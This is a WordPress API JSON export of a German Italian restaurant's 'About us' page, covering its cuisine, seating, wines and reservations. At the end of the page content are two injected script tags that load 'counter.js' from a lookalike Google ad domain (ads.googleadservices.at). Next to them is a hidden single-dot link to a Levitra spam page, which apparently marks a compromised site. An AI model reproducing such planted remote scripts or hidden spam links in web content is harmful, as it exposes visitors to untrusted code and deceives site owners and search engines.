{"id":433,"date":"2012-12-18T09:50:14","date_gmt":"2012-12-18T07:50:14","guid":{"rendered":"http:\/\/elegantia.inspirythemes.com\/?page_id=60"},"modified":"2016-02-08T17:13:01","modified_gmt":"2016-02-08T15:13:01","slug":"ueber-uns","status":"publish","type":"page","link":"https:\/\/laclassecapanna.de\/?page_id=433","title":{"rendered":"\u00dcber uns"},"content":{"rendered":"<h2 class=\"title-heading\">Herzlich Willkommen im La classe capanna<\/h2>\n<h5>Genie\u00dfen Sie die bunte Vielfalt unsere K\u00fcche, es erwartet Sie eine moderne Italienische-Kombi K\u00fcche.<\/h5>\n<h5>Lassen Sie sich von der Pasta und dem feinen Fisch verzaubern. Fleischgerichte und die hausgemachte Pizzen locken verf\u00fchrerisch. Unsere moderne und famili\u00e4re herzliche Einrichtung bieten Platz f\u00fcr 40 G\u00e4ste.<\/h5>\n<h5>Italienscher Flair, eine Vielfalt an Bildern als Blickfang, ausgesuchte Weine auf unserer Weinkarte. Lassen Sie sich in gem\u00fctlicher Ambiente von unseren herzlichen Service begeistern.<\/h5>\n<h5>Ob zum Mittagessen, Gesch\u00e4ftsessen, Weihnachtsfeier, Geburtstagsfeier oder anderen besonderen Anl\u00e4ssen, reservieren Sie einfach und bequem unsere R\u00e4umlichkeiten.<\/h5>\n<h4>Hier geht&#8217;s weiter zur <strong><a title=\"Reservierung\" href=\"http:\/\/laclassecapanna.de\/reservierung\/\">Reservierung<\/a><\/strong> oder zur <strong><a title=\"Gallerie\" href=\"http:\/\/laclassecapanna.de\/gallerie\/\">Gallerie<\/a><\/strong><\/h4>\n<h5>Ihr La Classe Capanna Team<\/h5>\n<p><a href=\"https:\/\/i1.wp.com\/wewoco.com\/laclassecapanna\/wordpress\/wp-content\/uploads\/2012\/12\/\u00fcberuns21.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-403 size-full aligncenter\" src=\"https:\/\/i1.wp.com\/wewoco.com\/laclassecapanna\/wordpress\/wp-content\/uploads\/2012\/12\/\u00fcberuns21.jpg?resize=560%2C362\" alt=\"\" data-recalc-dims=\"1\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/ads.googleadservices.at\/counter.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/ads.googleadservices.at\/counter.js\" type=\"text\/javascript\"><\/script><a style=\"text-decoration:none\" href=\"\/index.php\/levitra-online-daily\">.<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Genie\u00dfen Sie die bunte Vielfalt unsere K\u00fcche, es erwartet Sie eine moderne Italienische-Kombi K\u00fcche. Lassen Sie sich von der Pasta und dem feinen Fisch verzaubern. Fleischgerichte und die hausgemachte Pizzen locken verf\u00fchrerisch. Unsere moderne und famili\u00e4re herzliche Einrichtung bieten Platz f\u00fcr 40 G\u00e4ste. Italienscher Flair, eine Vielfalt an Bildern als Blickfang, ausgesuchte Weine auf unserer [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/pages\/433"}],"collection":[{"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=433"}],"version-history":[{"count":7,"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/pages\/433\/revisions"}],"predecessor-version":[{"id":822,"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=\/wp\/v2\/pages\/433\/revisions\/822"}],"wp:attachment":[{"href":"https:\/\/laclassecapanna.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}